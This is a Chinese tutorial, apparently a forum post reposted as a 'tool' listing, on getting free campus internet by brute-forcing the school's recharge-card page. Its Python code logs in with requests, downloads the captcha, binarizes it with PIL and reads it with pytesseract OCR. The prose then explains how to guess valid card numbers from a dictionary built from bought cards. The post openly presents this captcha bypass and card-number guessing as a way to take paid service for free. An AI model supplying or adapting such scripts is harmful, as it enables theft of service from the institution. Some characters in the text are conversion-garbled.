python免費(fèi)獲取校園網(wǎng)是一款專業(yè)級(jí)的編程工具。先歡迎同學(xué)們開學(xué)啦!小編也是經(jīng)歷了學(xué)生時(shí)代,知道學(xué)生時(shí)代比較頭疼的一些問題,校園網(wǎng)就是其中之一。校園網(wǎng)一直是坑爹一般的存在,別人都用上5G了,而我們學(xué)校卻還停留在10塊錢3個(gè)G的時(shí)代,也許你會(huì)說,用手機(jī)的流量就行了呀,但是學(xué)校有些資源還必須得要內(nèi)網(wǎng)才能訪問呀。然而我們知道,校園網(wǎng)的安全性根本就比不了那些公司,有很多大佬一直也在學(xué)校的學(xué)校的內(nèi)網(wǎng)中遨游,我等只能膜拜,今天我們就一起來看看我是怎么變相破解校園網(wǎng)的。為什么說是變相呢,因?yàn)楸疚牟捎玫姆椒]有你想的那么高大上,額。。。。。。,就是沒有你想象的那么牛逼,原理其實(shí)很簡單,就是學(xué)校開通了網(wǎng)上充值的通道,但是,這個(gè)通道必須的得要登錄,而且還要驗(yàn)證碼,所以本文也就基于python來模擬登陸且識(shí)別驗(yàn)證碼,實(shí)現(xiàn)一個(gè)暴力破解充值卡的功能。
軟件使用步驟:
思路整理:
1:request模擬登陸系統(tǒng)
2:進(jìn)入充值界面
3:獲取充值界面的驗(yàn)證碼,并識(shí)別驗(yàn)證碼
4:將卡號(hào)和驗(yàn)證碼發(fā)送給服務(wù)器,獲取結(jié)果
具體操作:
1:request模擬登陸系統(tǒng)
廢話不多說(本人廢話比較多,手動(dòng)狗頭.jpg)。登錄頁面是這樣子的
第一次登錄,是不要驗(yàn)證碼的,所以,在登錄的過程中,是不用識(shí)別驗(yàn)證碼的,但是我們輸入錯(cuò)了賬號(hào)密碼的話,會(huì)出現(xiàn)驗(yàn)證碼
我們輸入賬號(hào)密碼,登錄抓包試試
顯而易見,mode是登錄,login是賬號(hào),passwd是admin,vcode是驗(yàn)證碼,上面出現(xiàn)了vcode是因?yàn)槲疑洗屋斿e(cuò)了賬號(hào)密碼,要輸入驗(yàn)證碼驗(yàn)證,但是我們加入第一次輸對了賬號(hào)密碼就可以不用vcode
那么我們來看看服務(wù)器給我們返回的數(shù)據(jù)頭(主要是setcookie)
哇,就只有phpsession一個(gè),天助我也,在這里我用了requests的session()函數(shù),這個(gè)可以保存服務(wù)器返回的cookie,下次用session發(fā)送就會(huì)帶上上次的cookie,還挺好用。但是用了這么久,還是發(fā)現(xiàn)有些cookie保存不了,不知道是我太菜還是怎么地,還望大佬解答。輸對了站好密碼登錄,然后進(jìn)入個(gè)人信息頁面(窮光蛋一個(gè),希望各位自動(dòng)忽略{:1_907:} )
以下是登錄的代碼:由于隱私問題,將host去掉了,反正也影響不大,只是給大家一個(gè)例子
from PIL import Image #用于處理驗(yàn)證碼圖片的庫
import requests
import pytesseract #用于識(shí)別驗(yàn)證碼的庫
import re
from bs4 import BeautifulSoup #用于頁面的信息提取
zh=input('請輸入校園網(wǎng)賬號(hào):')
mm=input('請輸入校園網(wǎng)密碼:')
cardid=input('輸入你要查詢的充值卡號(hào):')
session=requests.session()#用這個(gè)能夠保存服務(wù)器返回的setcookie字段,就可以不用在下次的請求頭中自己構(gòu)造cookie了,還挺方便
def get_PHPSESSID():#獲取會(huì)話id
head={'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3',
'Accept-Encoding':'gzip, deflate',
'Accept-Language':'zh-CN,zh;q=0.9,en;q=0.8',
'Connection':'keep-alive',
'Host':'...',
'Referer':'http://.../login.jsp?sourceurl=http://www.msftconnecttest.com/redirect',
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36'
}
cookie=session.get(url='http://.../zili/',headers=head)
print(session.cookies)
2、3:進(jìn)入充值界面并獲取充值界面的驗(yàn)證碼,并識(shí)別驗(yàn)證碼
充值界面如下:
想要獲取充值或查詢,那么我們得要獲得驗(yàn)證碼,然后將驗(yàn)證碼的數(shù)字和充值卡號(hào)發(fā)送給服務(wù)器,那么驗(yàn)證碼如何獲。靠聪旅
發(fā)送這個(gè)請求,獲得圖片,保存在本地,然后將圖片灰度化(就是變成黑白),提高識(shí)別率,返回識(shí)別結(jié)果,我們還是老看程序,邊看邊說
def get_img():#獲取驗(yàn)證碼保存到本地
head={'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3',
'Accept-Encoding':'gzip, deflate',
'Accept-Language':'zh - CN, zh;q = 0.9, en;q = 0.8',
'Connection':'keep - alive',
'Host':'...',
'Referer':'.../zili/myinfo.php',
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36'
}#請求頭
session.get(url='http://.../zili/charge_card.php',headers=head,stream=True)#進(jìn)入充值的界面
head1={'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3',
'Accept-Encoding':'gzip, deflate',
'Accept-Language':'zh - CN, zh;q = 0.9, en;q = 0.8',
'Connection':'keep - alive',
'Host':'...',
'Referer':'http://.../zili/charge_card.php',
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36'
}
result=session.get(url='http://.../zili/vcode.php',headers=head1)#獲取圖片,所返回的是一組數(shù)據(jù)流,也就是圖片的數(shù)據(jù)
image = result.content#result.content代表返回的數(shù)據(jù),賦值給image變量
with open(r'img/yzm.jpg', 'wb') as xiazai:#打開img文件夾下的yzm.jpg圖片文件,wb代表以‘’二進(jìn)制寫”的方式打開,如果沒有這個(gè)文件,會(huì)幫你建立這個(gè)文件,并將這個(gè)騷操作以xiazai來表示
xiazai.write(image)#將image里的數(shù)據(jù)寫進(jìn)xiazai操作打開的yzm.jpg文件中
經(jīng)過上面的程序,我們就可以把驗(yàn)證碼下載到本地,如下
但是這個(gè)圖片是彩色的,我們得要把它變成灰色的,邊看程序邊說
def prc_pic():#處理下載的驗(yàn)證碼
yzm=Image.open(r'img\yzm.jpg')#用image庫里的Image打開yzm.jpg圖片
yzm_l=yzm.convert('L')#將圖片灰度化
yzm_l.save(r'img\jzm.jpg')#將生成的灰度圖保存為jzm.jpg
yuzhi=150#定義一個(gè)閾值,大于這個(gè)值為黑色,小于這個(gè)值為白色
table = []#用來保存值的數(shù)組
for i in range(256):
if i < yuzhi:
table.append(0)
else:
table.append(1)
out = yzm_l.point(table, '1')
out.save(r'img\yzm1.jpg')
這里我們說一下,圖片就是由矩陣組成,對于黑白圖像,每個(gè)像素用一個(gè)字節(jié)數(shù)據(jù)來表示,而在彩色圖像中,每個(gè)像素需用三個(gè)字節(jié)數(shù)據(jù)來表述。彩色圖像可以分解成紅(R)、綠(G)、藍(lán)(B)三個(gè)單色圖像,任何一種顏色都可以由這三種顏色混合構(gòu)成。在圖像處理中,彩色圖像的處理通常是通過對其三個(gè)單色圖像分別處理而得到的,每一幅圖像在構(gòu)成上,都是由一個(gè)個(gè)像素組成的矩陣,每一個(gè)像素為單元格。彩色圖像的像素的由三原色(紅,綠,藍(lán))構(gòu)成元組,灰度圖像的像素是一個(gè)單值(前邊我們已經(jīng)把圖片灰度化了),每個(gè)像素的值范圍為(0,255)這里我們定義一個(gè)閾值,大于這個(gè)閾值,就把這個(gè)點(diǎn)變?yōu)?,小于這個(gè)值,把他變?yōu)?,這里的0,1也就是黑白,我們一起來看看,處理后的圖片
灰度圖:
黑白圖:
處理的效果還是挺好的,噪點(diǎn)少了很多,你可以調(diào)閾值來測試最好的處理效果
最后,就是識(shí)別圖片,程序很簡單
def shibie(): # 識(shí)別圖片,返回結(jié)果
print("識(shí)別結(jié)果為"+pytesseract.image_to_string(r'img\yzm.jpg'))
return pytesseract.image_to_string(r'img\yzm.jpg')
4:將卡號(hào)和驗(yàn)證碼發(fā)送給服務(wù)器,獲取結(jié)果哈哈,現(xiàn)在萬事具備,只欠東風(fēng),發(fā)送查詢充值指令抓個(gè)包,卡號(hào)錯(cuò)了,但是發(fā)送的數(shù)據(jù)包已經(jīng)知道了
所以,接下來就是不斷的試充值卡號(hào),反正驗(yàn)證碼形同虛設(shè),想怎么試就怎么試,那么怎么試卡號(hào)成功率才能大一點(diǎn)?就去買幾張卡號(hào),看看有什么規(guī)律嘛,生成一個(gè)字典,然后就可以一個(gè)個(gè)暴力破解了。